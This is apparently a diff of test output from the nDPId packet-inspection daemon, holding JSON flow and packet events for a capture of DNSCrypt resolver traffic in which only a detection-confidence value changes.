AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739299327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":53299,"dst_port":1053,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739299327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":53299,"dst_port":1053,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00224{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":24,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739299327} 00419{"packet_event_id":1,"packet_event_name":"packet","packet_id":24,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739299327,"pkt":"REREREREZmZmZmZmCABFAABQFy8Aub0RMd8KAAABPtK0RwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00704{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":946739299355,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"thread_ts_msec":946739299355,"pkt":"ZmZmZmZmRERERERECABFAADWguYAADURTls+0rRHCgAAAQQdxzwAwvgJByeBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydANuczIIaXJpc2VkZW4CZnIAABAAAcAMABAAAQAAAAAAfXxETlNDAAEAAD603DX03HFYUGSUUMZQ5AFHqQDCbcRbndp5mF3SVu19eScXuGrpg2nLc5WDzV06y+FJw+Dah4cv34QVXrvZ7Q8nY1y4iPNLnPDmhCiX6M9Qv8kZOhpPDs+tmijF9ICJLydjXLiI80ucXop2NF6KdjRga6m0"} 00704{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":946739299356,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"thread_ts_msec":946739299356,"pkt":"ZmZmZmZmRERERERECABFAADWguUAADQRT1w+0rRHCgAAAQQdzZwAwvGtByOBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydANuczIIaXJpc2VkZW4CZnIAABAAAcAMABAAAQAAAAAAfXxETlNDAAEAAD603DX03HFYUGSUUMZQ5AFHqQDCbcRbndp5mF3SVu19eScXuGrpg2nLc5WDzV06y+FJw+Dah4cv34QVXrvZ7Q8nY1y4iPNLnPDmhCiX6M9Qv8kZOhpPDs+tmijF9ICJLydjXLiI80ucXop2NF6KdjRga6m0"} 00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":27,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304328,"flow_last_seen":946739304328,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304328,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":53697,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02424{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":946739304328,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739304328,"pkt":"REREREREZmZmZmZmCABFAAXcHPkgAL0RfJ0KAAABuYbEN9HBIPsGBAgHfxoBAAABAAAAAAABATINZG5zY3J5cHQtY2VydARyZG5zBmZhZWxpeANuZXQAABAAAQAAAAAAAAAAAAXAAAwFvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304328,"flow_last_seen":946739304328,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304328,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":53697,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304328,"flow_last_seen":946739304328,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304328,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":53697,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":28,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304328,"flow_last_seen":946739304328,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304328,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":37413,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01141{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":946739304328,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739304328,"pkt":"REREREREZmZmZmZmCABFAAIcHPpAAL0RYFwKAAABuYbEN5IlIPsCCECUfx8BAAABAAAAAAABATINZG5zY3J5cHQtY2VydARyZG5zBmZhZWxpeANuZXQAABAAAQAAAAAAAAAAAAHEAAwBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":28,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304328,"flow_last_seen":946739304328,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304328,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":37413,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":28,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304328,"flow_last_seen":946739304328,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304328,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":37413,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00224{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":29,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739304328} 00419{"packet_event_id":1,"packet_event_name":"packet","packet_id":29,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739304328,"pkt":"REREREREZmZmZmZmCABFAABQHPkAub0RoXAKAAABuYbENwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304328,"flow_last_seen":946739304328,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304328,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":35005,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02424{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":946739304328,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739304328,"pkt":"REREREREZmZmZmZmCABFAAXcHPsgAL0RfJsKAAABuYbEN4i9IPsGBFEJfxwBAAABAAAAAAABATINZG5zY3J5cHQtY2VydARyZG5zBmZhZWxpeANuZXQAABAAAQAAAAAAAAAAAAXAAAwFvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":30,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304328,"flow_last_seen":946739304328,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304328,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":35005,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":30,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304328,"flow_last_seen":946739304328,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304328,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":35005,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00224{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":31,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739304328} 00419{"packet_event_id":1,"packet_event_name":"packet","packet_id":31,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739304328,"pkt":"REREREREZmZmZmZmCABFAABQHPsAub0RoW4KAAABuYbENwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":32,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304328,"flow_last_seen":946739304328,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304328,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":59405,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01141{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":946739304328,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739304328,"pkt":"REREREREZmZmZmZmCABFAAIcHPxAAL0RYFoKAAABuYbEN+gNIPsCCECUfx0BAAABAAAAAAABATINZG5zY3J5cHQtY2VydARyZG5zBmZhZWxpeANuZXQAABAAAQAAAAAAAAAAAAHEAAwBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304328,"flow_last_seen":946739304328,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304328,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":59405,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304328,"flow_last_seen":946739304328,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304328,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":59405,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":33,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304328,"flow_last_seen":946739304328,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304328,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":50435,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 